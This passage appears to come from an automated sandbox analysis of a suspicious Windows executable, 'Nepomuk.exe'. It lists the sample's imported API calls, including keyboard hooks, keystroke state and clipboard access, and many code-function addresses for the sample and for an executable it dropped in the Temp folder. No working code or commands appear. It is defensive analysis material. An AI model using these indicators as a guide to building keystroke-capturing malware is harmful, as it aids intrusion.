ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF1C500_2_00EF1C50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF13A00_2_00EF13A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF11100_2_00EF1110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158C1100_2_0158C110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015991100_2_01599110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159C1100_2_0159C110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015901100_2_01590110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159B1000_2_0159B100
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015761D00_2_015761D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156A1DF0_2_0156A1DF
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157B1C00_2_0157B1C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015731B40_2_015731B4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158A0500_2_0158A050
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155E00C0_2_0155E00C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015970C40_2_015970C4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015850F40_2_015850F4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015720890_2_01572089
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015590B00_2_015590B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015983400_2_01598340
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158A3700_2_0158A370
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015623100_2_01562310
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158031F0_2_0158031F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015533F40_2_015533F4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015523B00_2_015523B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015842750_2_01584275
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015582D00_2_015582D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015652C20_2_015652C2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015922800_2_01592280
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015772A00_2_015772A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155B5500_2_0155B550
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158454A0_2_0158454A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015715100_2_01571510
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155350A0_2_0155350A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015845340_2_01584534
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156D5E00_2_0156D5E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015A05BE0_2_015A05BE
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156F4500_2_0156F450
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015754300_2_01575430
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156B4390_2_0156B439
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159C4F00_2_0159C4F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015604F80_2_015604F8
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015734E50_2_015734E5
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159B4E00_2_0159B4E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015534EA0_2_015534EA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015984A00_2_015984A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015947500_2_01594750
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015957500_2_01595750
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158F7410_2_0158F741
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155A7100_2_0155A710
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155C7D00_2_0155C7D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156E7CF0_2_0156E7CF
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015637F90_2_015637F9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015657900_2_01565790
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015516500_2_01551650
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015536520_2_01553652
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156467E0_2_0156467E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015726100_2_01572610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159C6D00_2_0159C6D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015749700_2_01574970
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015739300_2_01573930
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015899CD0_2_015899CD
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156C9F00_2_0156C9F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015B09800_2_015B0980
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155E9B00_2_0155E9B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156B9A10_2_0156B9A1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015908600_2_01590860
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015988000_2_01598800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158E8CF0_2_0158E8CF
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015578E00_2_015578E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159B8E00_2_0159B8E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01584B5B0_2_01584B5B
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158BB600_2_0158BB60
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157DB300_2_0157DB30
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01571B3D0_2_01571B3D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155BBC00_2_0155BBC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01576BC00_2_01576BC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01583BC40_2_01583BC4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01584BC60_2_01584BC6
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01583BC20_2_01583BC2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01590BE00_2_01590BE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156CBBA0_2_0156CBBA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01569AE20_2_01569AE2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01585AE00_2_01585AE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01559AB00_2_01559AB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155FAA00_2_0155FAA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01557D500_2_01557D50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01552D500_2_01552D50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158ED440_2_0158ED44
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155ADD00_2_0155ADD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156BDF30_2_0156BDF3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156DDE00_2_0156DDE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0159AC500_2_0159AC50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0155CC400_2_0155CC40
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157FC7D0_2_0157FC7D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01598C600_2_01598C60
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01556C000_2_01556C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01591C000_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01584C050_2_01584C05
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01560CC00_2_01560CC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157CC900_2_0157CC90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0156AF560_2_0156AF56
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015A2F590_2_015A2F59
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01573F610_2_01573F61
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015A0F010_2_015A0F01
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01560F0A0_2_01560F0A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01588F250_2_01588F25
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0157EFE00_2_0157EFE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01555E560_2_01555E56
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01569E150_2_01569E15
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01587E380_2_01587E38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01595E200_2_01595E20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_01562EE30_2_01562EE3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158BE800_2_0158BE80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158FEB00_2_0158FEB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035953500_2_03595350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355E3400_2_0355E340
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355B3100_2_0355B310
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357EBD00_2_0357EBD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356ABFA0_2_0356ABFA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035663900_2_03566390
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356527E0_2_0356527E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359D2D00_2_0359D2D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03561AF80_2_03561AF8
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03597A810_2_03597A81
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035841D10_2_035841D1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356A1DB0_2_0356A1DB
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035629E40_2_035629E4
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035700500_2_03570050
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359B8500_2_0359B850
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355D8400_2_0355D840
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359800F0_2_0359800F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357B0000_2_0357B000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356003D0_2_0356003D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359D0F00_2_0359D0F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357E7300_2_0357E730
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035917E00_2_035917E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359CD100_2_0359CD10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03576DD00_2_03576DD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03560D880_2_03560D88
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035914600_2_03591460
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359C4E00_2_0359C4E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035963500_2_03596350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035903410_2_03590341
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356B36A0_2_0356B36A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03571B100_2_03571B10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357BB000_2_0357BB00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03589B250_2_03589B25
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355D3D00_2_0355D3D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035643F90_2_035643F9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03573BE00_2_03573BE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357FBE00_2_0357FBE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359AB800_2_0359AB80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356F3B00_2_0356F3B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03556A560_2_03556A56
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035522500_2_03552250
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035542520_2_03554252
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356A2660_2_0356A266
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035932690_2_03593269
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035732100_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03588A380_2_03588A38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03596A200_2_03596A20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03598AEA0_2_03598AEA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03563AE30_2_03563AE3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356A2960_2_0356A296
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358CA800_2_0358CA80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03590AB00_2_03590AB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035589500_2_03558950
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355C1500_2_0355C150
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035539500_2_03553950
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358615F0_2_0358615F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358F9440_2_0358F944
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035721100_2_03572110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356B9250_2_0356B925
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355B9D00_2_0355B9D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356D9F50_2_0356D9F5
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356C9F30_2_0356C9F3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356E9E00_2_0356E9E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359A9E00_2_0359A9E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357F8550_2_0357F855
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035998600_2_03599860
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358081C0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035578000_2_03557800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035988010_2_03598801
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035928000_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035760300_2_03576030
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035740E50_2_035740E5
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359C0E00_2_0359C0E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357D8900_2_0357D890
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359A8B00_2_0359A8B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035990A00_2_035990A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03598F400_2_03598F40
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358AF700_2_0358AF70
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358C7600_2_0358C760
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03562F100_2_03562F10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03580F080_2_03580F08
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356DF0E0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356CFD50_2_0356CFD5
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355C7C00_2_0355C7C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035777C00_2_035777C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03552FB00_2_03552FB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357B7B00_2_0357B7B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035816500_2_03581650
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03553E100_2_03553E10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355BE100_2_0355BE10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03558ED00_2_03558ED0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03565EC20_2_03565EC2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035866E00_2_035866E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357FE840_2_0357FE84
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03592E800_2_03592E80
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355A6B00_2_0355A6B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035606A00_2_035606A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035626A00_2_035626A0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03577EA00_2_03577EA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035615560_2_03561556
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356CD5F0_2_0356CD5F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035755700_2_03575570
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358CD100_2_0358CD10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03599D100_2_03599D10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03590D100_2_03590D10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035925100_2_03592510
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359BD000_2_0359BD00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035745300_2_03574530
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358A5CD0_2_0358A5CD
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356D5F00_2_0356D5F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0355F5B00_2_0355F5B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0356C5A10_2_0356C5A1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358AC500_2_0358AC50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035994000_2_03599400
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359AC300_2_0359AC30
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358F4CF0_2_0358F4CF
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359ACC00_2_0359ACC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357DCF00_2_0357DCF0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035584E00_2_035584E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357D49C0_2_0357D49C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03559CB00_2_03559CB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357BCB20_2_0357BCB2
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_00951F007_2_00951F00
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009511107_2_00951110
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009517907_2_00951790
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009513A07_2_009513A0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_018D09807_2_018D0980
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_00951F0010_2_00951F00
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_0095111010_2_00951110
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_0095179010_2_00951790
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009513A010_2_009513A0
